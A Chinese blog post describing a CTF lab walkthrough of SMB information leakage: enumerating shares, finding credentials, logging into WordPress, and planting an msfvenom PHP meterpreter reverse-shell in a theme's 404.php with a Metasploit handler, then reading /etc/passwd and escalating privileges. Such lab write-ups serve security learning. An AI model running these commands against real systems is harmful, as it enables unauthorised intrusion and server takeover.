小白学习CTF第三天-SMB信息泄露

最新推荐文章于 2024-07-22 14:33:21 发布
最新推荐文章于 2024-07-22 14:33:21 发布
阅读量437 收藏
点赞数
文章标签: linux python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bbhh1139/article/details/105462062
版权

SMB信息泄露

SMB介绍

在这里插入图片描述

信息探测

基本操作与之前的一样,这里就不过多叙述了。
在这里插入图片描述
信息探测的方式有很多:
在这里插入图片描述
分析探测结果与之前的都类似,基本上分析以下nmap扫描出来的结果。

针对SMB协议弱点进行分析

在这里插入图片描述
针对上面的进行一下实际操作:
IPC我们没有权限查看这个就失败了,换一个扫描
在这里插入图片描述
换成share$:
在这里插入图片描述
我们get敏感文件之后,我们记得查看一下,并且记住里面出现的敏感信息:
在这里插入图片描述
之后我们在去找找其他的敏感信息:
在这里插入图片描述
在这里插入图片描述
查看所得到的敏感文件
在这里插入图片描述
我们在这里发现了用户名以及密码。
我们在之前的扫描结果中发现开放了很多服务,我们都可以使用这个用户名以及密码尝试登陆一下
在这里插入图片描述
在这里插入图片描述
mysql以及ssh都登陆失败了。
在这里插入图片描述
我们使用searchsploit也没有扫描到任何有价值的信息。
那接下来我们只能针对http服务下手了。
在这里插入图片描述
我们在dirb的结果中发现一些有价值的链接,打开看一下:
在这里插入图片描述
尝试使用之前的用户名以及密码登陆:
在这里插入图片描述在这里插入图片描述
登陆成功!

针对HTTP协议弱点分析

在这里插入图片描述
我们需要制作一个webshell来上传上去,以来获取权限。

msfvenom -p php/meterpreter/reverse_tcp lhost = 192.168.56.104 lport = 4444 -f raw

在这里插入图片描述
在这里插入图片描述
复制粘贴一下(注意不要把注释符号也复制进去)
在这里插入图片描述
之后我们使用msfconsole

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp

在这里插入图片描述
之后run一下:
在这里插入图片描述

上传Webshell

在这里插入图片描述
在网页中找到对应的上传位置:
在这里插入图片描述
找到404的位置
在这里插入图片描述
在这里插入图片描述
我们新打开一个网页输入以下地址(主题以及其余内容根据自己情况更改)

http://192.168.56.102/wordpress/wp-content/themes/twentyfifteen/404.php

在这里插入图片描述
之后我们打开之前run 的终端我们会发现它返回了对应的结果:
在这里插入图片描述
执行shell
在这里插入图片描述

查找flag信息

在这里插入图片描述
先优化终端,和之前的操作一样:

python -c "import pty;pty.spawn('/bin/bash')"

之后查找用户名cat /etc/passwd这里存有用户名:
在这里插入图片描述
我们发现用户名是:togie
密码这可能是我们最开始找到的那个敏感信息:12345(尝试一下)
在这里插入图片描述
尝试提权:
在这里插入图片描述
提权成功!!!

最后我们查找flag就可以了!
在这里插入图片描述

总结

在这里插入图片描述
搞定!!!

bbhh1139
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF练习:SMB信息泄露
qq_43233085的博客
11-18 1296
CTF练习:SMB信息泄露环境准备信息收集深度挖掘进入靶机 靶机地址: 链接:https://pan.baidu.com/s/1XupHpFMZee7pzTax5xiMxw 提取码:fa49 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.75.143 查看靶机的IP,为172.19.75.237 ping一下...
SMB信息泄露
qq_43627239的博客
06-05 1672
首先打开我们的kali攻击机和靶机 输入命令ifconfig查看攻击机ip 然后用nmap扫描出靶机的ip nmap -sV 靶机ip扫描出靶机开启的端口服务 发现139/445开启的smb服务 针对smb协议,使用空口令 -- smbclient –L IP 针对SMB协议,使用空口令,若口令尝试登陆,并查看敏感文件,下载查看; -- smbclient –L IP ...
ctf训练 SMB信息泄露
qq_43799246的博客
11-30 513
ctf训练 SMB信息泄露 SMB介绍 SMB (Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。后来Linux移植了SMB,并称为samba。 SMB协议是基于TCP - NETBIOS下的,一般端口使用为139,445 SMB协议,计算机可以访问网络资源,下载对应的资源文件 实验环境 一台kail攻击机 和 靶机 靶机镜像: https://pan.baidu.com/s/12R-y
CTF-SMB信息泄露【简单易懂】
最新发布
dzqxwzoe的博客
07-22 807
作者简介:不知名白帽,网络安全学习者。
SMB服务信息泄露
wwxxss
11-03 552
SMB信息泄露的详细渗透过程
CTF-7.SMB信息泄露
woo233的博客
09-13 582
SMB (Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。后来Linux移植了SMB,并称为samba。SMB协议是基于TCP - NETBIOS下的,一般端口使用为139,445SMB协议,计算机可以访问网络资源,下载对应的资源文件对于开放139和445端口的机器一定要注意是否可以直接使用smbclient登录到共享目录查找敏感文件。
smb信息泄露实战
weixin_51339377的博客
03-30 260
1.正常使用nmap进行目标的扫描 我们可以尝试下载里面的文件 使用get命令即可下载 此时文件提示密码是12345 在查看一下其他的文件目录 cd /wordpress ls wordpress的目录中一般都是有配置文件的 我们通过get把wordpress的配置文件下载下来 接下来可以尝试去网站进行登录 由于不知道登录的后台地址 我们可以首先通过工具对目标网站进行扫描 这里可以通过dirb进行扫描 dirb http://192.168.1.47 ..
CTF信息泄露
weixin_58319685的博客
04-22 259
1、目录遍历 1.1、打开链接 1.2、打开flag所在网页 1.3、开始寻找flag 1.4、 找到flag 1.5、提交flag 2、PHPINFO 2.1、打开链接 2.2、打开flag所在网页 2.3、寻找flag 2.4、找到flag 2.5、提交flag 3、备份文件下载 ...
ctf-all-in-one
01-30
ctf-all-in-one
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛中,可利用该工具自动识别编码类型并解码,快速解决misc类别的密码题目。 其他说明: 该工具具备智能判断密码...
CTF夺旗-SMB信息泄露-靶机渗透实战
居上
11-28 988
SMB信息泄露信息收集服务利用针对SMB尝试空口令登陆针对SMB远程溢出漏洞进行分析针对HTTP协议弱点分析上传WebShell 实验环境 攻击机:192.168.36.128 靶机:192.168.36.138 靶机下载地址 链接:https://pan.baidu.com/s/13L3humuHmHFRu2aqwHatZg 提取码:ox8g 信息收集 nmap -sV {ip} #探测目标的服务以及版本 nmap -A -v -T4 #{-A}扫描所有信息,{-v}屏幕回显,{-T4}以最快线程 服
CTFHub-Web--信息泄露
m0_69003772的博客
04-23 1400
CTF简介以及信息泄露下题目解题过程 文章目录 前言 一、基础知识 1.CTF简介 2.竞赛模式 2.1.理论知识 2.2.Jeopardy-解题 2.3.AwD-攻防模式 2.4.AWP-攻防增强 2.5.RHG-自动化[ AI自动化] 2.6RW-真实世界 2.7.KoH-抢占山头 2.8.Mix[混合] 3.比赛形式 3.1.线上 3.2.线下 4.题目类型 4.1.Web 4.2.Pwn 4.3.Reverse 4.4.C.
CTF训练笔记(三)- SMB信息泄露
morrino的博客
02-05 1680
大量搜索各种信息,尝试利用各种途径拿到shell进而提权。[CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
SMB信息泄露提权
weixin_45007073的博客
01-02 726
记录一下基于SMB信息泄露的提权过程 准备工作 镜像下载地址: 链接:https://pan.baidu.com/s/1eKjpvhczXESM1K7mqDv6Tw 提取码:bxps 攻击过程 使用netdiscover发现存活主机 netdidscover -i eth0 使用nmap扫描主机 发现目标主机开放了远程连接端口和smb、mysql服务端口 尝试登陆smb服务收集敏感信息,空指令登陆 访问共享目录,一步步地收集敏感信息 smbclient '\\192.168.75.153\p
毕业一年,从事运维感觉没有出路,如何转型更有前景?
Python_0011的博客
07-08 775
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
SMB信息泄露的利用
Scalzdp的专栏
11-17 924
SMB的协议出现较早,应用较广泛,但是早期计算机协议注重应用的快速建立,而对安全的要求并不太严格,所以很多较老的设备使用了存在漏洞的SMB协议,就会存在安全隐患。我们在SMB漏洞的利用中,主要还是基于msf提供的一些payload,这些payload其实都是别人做好了的,所以用起来特别方便,也从另一个方面反映如果有人要攻击利用SMB漏洞其实也很方便,所以我们在计算机安全防护上还需进行更多的考虑,必要的安全设置应该保留,不要为了一时方便,关闭所有安全防护的护盾。
CTFHub 命令注入-无过滤
07-25
CTFHub 命令注入-无过滤是一个题目,它的源代码中存在一个命令注入漏洞。在这个题目中,用户可以通过输入IP地址执行ping命令。\[1\]由于没有采用过滤,用户可以直接进行命令拼接,例如输入"192.168.43.222;ls"可以查看目录下的全部文件。\[2\]在这个题目中,flag被隐藏在网页源代码中。\[3\]为了防止命令注入漏洞,可以对用户输入进行过滤,例如过滤空格。 #### 引用[.reference_title] - *1* *2* [CTFHub -技能树 命令注入-无过滤](https://blog.csdn.net/qq_45653588/article/details/107556087)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFhub——命令执行](https://blog.csdn.net/qq_43277152/article/details/113649643)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值